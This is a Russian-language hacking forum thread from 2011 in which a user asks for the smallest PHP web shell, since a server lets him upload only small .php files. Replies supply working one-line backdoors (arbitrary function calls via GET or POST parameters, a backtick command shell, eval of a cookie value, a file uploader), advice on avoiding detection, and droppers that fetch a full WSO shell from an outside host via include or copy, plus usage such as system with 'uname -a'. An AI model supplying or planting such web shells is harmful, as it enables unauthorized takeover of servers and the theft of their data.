Самый маленький шелл?

Discussion in 'Болталка' started by alextrust, 6 Dec 2011.

  1. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    Нужно шелл размером в 5кб:)
    ничего меньше 19кб не нашел(
    из функционала требуется кнопка для загрузки файла на сервер
     
    #1 alextrust, 6 Dec 2011
  2. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,582
    Likes Received:
    1,310
    Reputations:
    1,557
    PHP:
    <?php move_uploaded_file($_FILES["file"]["tmp_name"], $_POST['filename']); ?>
     
    #2 M_script, 7 Dec 2011
  3. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    M_Script, Морду тоже скинь ему, а то не разберется как заливать.
     
    #3 |qbz|, 7 Dec 2011
  4. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    |qbz| прав)
     
    #4 alextrust, 7 Dec 2011
  5. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    <? $_GET['a']($_GET['b']); ?>

    чтобы не палиться юзай пост вместо гет и если хочешь красиво - isset добавь.
     
    _________________________
    #5 <Cyber-punk>, 7 Dec 2011
  6. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    PHP:
    <html>
        <    form action="http://shell.com/adres_shella.php" method="post" enctype="multipart/form-data">
                File: <input type="file" name="file"><br>
                Path to file of file: <input value="./" type="text" name="filename"><Br><br>
            <    input type="submit" value="Send">
        </    form>
    </    html>
     
    #6 |qbz|, 7 Dec 2011
  7. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    <?=@`$c`?>
    нужны
    short_open_tag register_globals
    Коротко и ясно. Спасибо raz0r.
     
    _________________________
    #7 <Cyber-punk>, 7 Dec 2011
  8. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    Opera mobile глючит. raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
     
    _________________________
    #8 <Cyber-punk>, 7 Dec 2011
  9. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    Да лан, забей, мен, я же пошутил. :) Че в асе пропадаешь?
     
    #9 |qbz|, 7 Dec 2011
  10. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    да норм. ща войду... у меня провайдер глючит((
     
    _________________________
    #10 <Cyber-punk>, 7 Dec 2011
  11. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    Я через минуток 10 там буду, пойду душ приму.
     
    #11 |qbz|, 7 Dec 2011
  12. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    Path to file of file: а тут что писать? :)

    вобщем,я могу загрузить на сервер файл .php но он должен быть не больше 9кб
     
    #12 alextrust, 7 Dec 2011
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    залей файл file.php с кодом
    PHP:
    <?php phpinfo(); ?>
    если отобразится phpinfo() то потом думай про шелл а варианты выше дали.
     
    _________________________
    #13 shell_c0de, 7 Dec 2011
  14. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    Там писать куда заливать (на сервере). По дефолту я сделал туда же, где и "заливатор". Шелл в нормальном понимании - сделай что-то типа:
    <?php include('http://alextrust.com/shell.txt'); ?>
    И залей в тхт код шелла например WSO по данному адресу.
     
    #14 |qbz|, 7 Dec 2011
  15. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    shell_c0de
    отобразилось
     
    #15 alextrust, 7 Dec 2011
  16. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    /showpost.php?p=2929913&postcount=5
     
    _________________________
    #16 shell_c0de, 7 Dec 2011
  17. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    что бы я еще что то понял :confused:
     
    #17 alextrust, 7 Dec 2011
  18. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    <?php copy("otkuda.ru/shell.txt","shell.php"); ?> будет тебе шелл больше 9 кб
     
    #18 wkar, 7 Dec 2011
  19. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    заливаешь код на сервак и дальше посылай файлу такой get запрос - file.php?a=system&b='uname -a'

    вроде так
     
    _________________________
    #19 <Cyber-punk>, 7 Dec 2011
  20. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    PHP:
    <? @eval($_COOKIE['h']); ?>
     
    #20 AnGeI, 7 Dec 2011
(You must log in or sign up to post here.)